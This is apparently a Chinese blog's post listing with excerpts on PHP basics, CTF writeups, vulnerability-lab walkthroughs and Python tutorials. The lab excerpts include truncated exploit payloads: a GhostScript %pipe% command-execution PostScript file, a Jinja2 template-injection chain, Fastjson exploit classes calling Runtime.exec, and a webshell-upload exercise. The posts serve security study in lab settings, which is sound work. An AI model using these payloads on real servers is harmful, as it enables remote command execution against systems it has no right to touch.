hello word的博客

原创 【PHP】--PHP基础

（视频参考：B站黑马程序员PHP零基础入门到精通教程）PHP是运行在服务器端的脚本语言，可以嵌入到HTML中。一、代码标记asp标记：<% php代码 %> 短标记：<? php代码 ?>脚本标记：<script language="php">php代码</script> 标准标记：<?php php代码?>1和2基本弃用，如果要用可以在php.ini中开启。二、注释PHP中有两种注释：行注释和块注释。行注释：/

原创 【buuctf-misc】--writeup

藏藏藏binwalk查看隐藏文件：有一个zip文件，分离：foremost压缩包里有个福利.docx，扫描获得flag。ezmisc更改图片的高度即可。把MRCTF换成flag提交。你有没有好好看网课？给了两个加密的zip，flag2.zip，flag3.zipflag2解密不出来，flag3可以跑出来。flag3解密出来是一个docx和一个mp4。flag3应该就是找到flag2的密码的关键。然而，520711

原创 【bmzctf-crypto】--writeup

4进制4进制转16进制，再转字符串。2018 AFCTF Morse摩斯电码解密得16进制。16进制转字符串得flag。2018 HEBTUCTF 社会主义接班人自由爱国自由平等自由文明平等自由平等平等自由和谐平等自由自由公正法治诚信民主公正平等公正友善自由法治公正公正友善敬业法治公正公正自由公正民主法治和谐公正公正公正诚信富强公正公正法治公正公正友善法治法治文明公正公正公正友善法治法治和谐公正自由公正平等公正诚信和谐法治爱国公正友善自由法治诚信和谐这是社会主

原创 【漏洞靶场】--GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

环境exp把如下代码保存为一个png文件。%!PSuserdict /setpagedevice undefsavelegal{ null restore } stopped { pop } if{ legal } stopped { pop } ifrestoremark /OutputFile (%pipe%ls / > /tmp/success && cat /tmp/success) currentdevice putdeviceprops上传，执行l

原创 【漏洞靶场】--Flask(Jinja2) 服务端模板注入漏洞

漏洞环境SSTI访问?name=1，触发ssti漏洞。payload{%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}%20{%%20if%20c.__name__%20==%20%27catch_warnings%27%20%}%20{%%20for%20b%20in%20c.__init__.__globals__.values()%20%}%20{%%20if%20b.__class__%20==%20{}.__c

原创 【漏洞靶场】--Fastjson 1.2.47 远程命令执行漏洞

漏洞环境exp准备将如下Java代码编译成class字节码。import java.io.BufferedReader;import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { Process p = Runtime.getRun

原创 【漏洞靶场】--fastjson 1.2.24 反序列化导致任意命令执行漏洞

漏洞环境以上是fastjson搭建好的默认页面。exp准备准备好如下Java代码。import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{public Exploit() throws Exception {Process p = Runtime.getRuntime().exec(new String[]{"/bin/ba

原创 伪加密文件的破解方法

原创 几种常见的编码方式

原创 upload-labs通关

第一关–上传webshell要求：要上传一个webs hell到服务器上。显示源码function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!");...

原创 VS2017一次性运行多个项目的方法

1.为什么总是运行同一个项目？2.VS2017怎么一次性运行多个项目？先说第一个问题：不管新建多少个项目，按调试运行的时候总是运行那一个，这是为什么呢？右键解决方案—&gt;属性：我们可以看到一个“单启动项目”，而已下面有一个项目，这个项目就是默认的调试项目，它就是你每次调试都运行的那个。在这里更改就可以改变每次运行的是哪个项目了。**还有另外一种方法：**右键项目—&gt;选择调试—...

转载 网络编程：TCP流式套接字多线程通信

流式套接字编程多线程通信环境：VS2017首先，附上原作者的文章链接： 作者：弱菜zc 来源：CSDN 原文：https ://blog.csdn.net/zchahaha/article/details/56831242 版权声明：本文为博主原创文章，转载请附上博文链接！新建一个控制台应用程序 ，新建一个解决方案，当然，新建应用程序的时候已经帮你新建好了解决方案，新建两个...

原创 Python轻松实现字符画

字符画怎么弄的？环境：pycharm，python3.0+库：pillow安装库：python2下是pip install PIL 就行了，python3是pip install pillow其实，pillow本来就是PIL派生的分支，只不过因为它越发完善，甚至，适用性已经超过了PIL，所以现在都是用pillow了。PIL只支持到python2.7而已，以上版本就不行咯！废话不多说，直接...

原创 Python爬虫：糗事百科

python小案例：爬虫-糗事百科段子环境：pycharm, python3.0+库：requests， BeautifulSoup如果没有这两个库：在命令行任意位置下（前提是你已经配置好了环境，这个网上大把，自行Google）：pip install requests, pip install bs4 import BeautifulSoup代码：import requestsfr...

原创 Python编程：人脸识别

python实现人脸识别工具：pycharm，python3.0+库模型：CV2代码：（代码都有注释哦）import cv2image = cv2.imread(‘F:/Editplus5/4.jpg’) # 加载一张图片cv2.namedWindow(‘face_check’, 0) # 显示图片，这里的0的意思就是使得窗口可以调整cv2.resizeWindow(‘face_...

转载 @转载 if_name_==_maind_ 的用法

37 Comments python编程中的if __name__ == 'main': 的作用和原理 发布于：2018-03-22&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;作者：admin&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;已聚集：73128人围观 ...

原创 Python写一个简单的翻译工具

python实现翻译小工具pycharm编辑器下的代码from tkinter import messageboximport jsonfrom tkinter import *import requestsdef fanyi():#拿到第一个输入框里面的内容#strip能去掉空格，不翻译content = entry1.get().strip()url = “http://f...

原创 Python文件打包成exe文件

怎么把.py文件打包成为.exe文件需要到的模块⚪ pip (多功能安装其他模块的工具)⚪ pyinstaller（语法：pip install pyinstaller，在python安装路径的script文件下）打包⚪pyinstaller 文件名称.py（这样打包会有很多库文件）⚪pyinstaller -F 文件名称.py⚪pyinstaller -F -w 文件名称.p...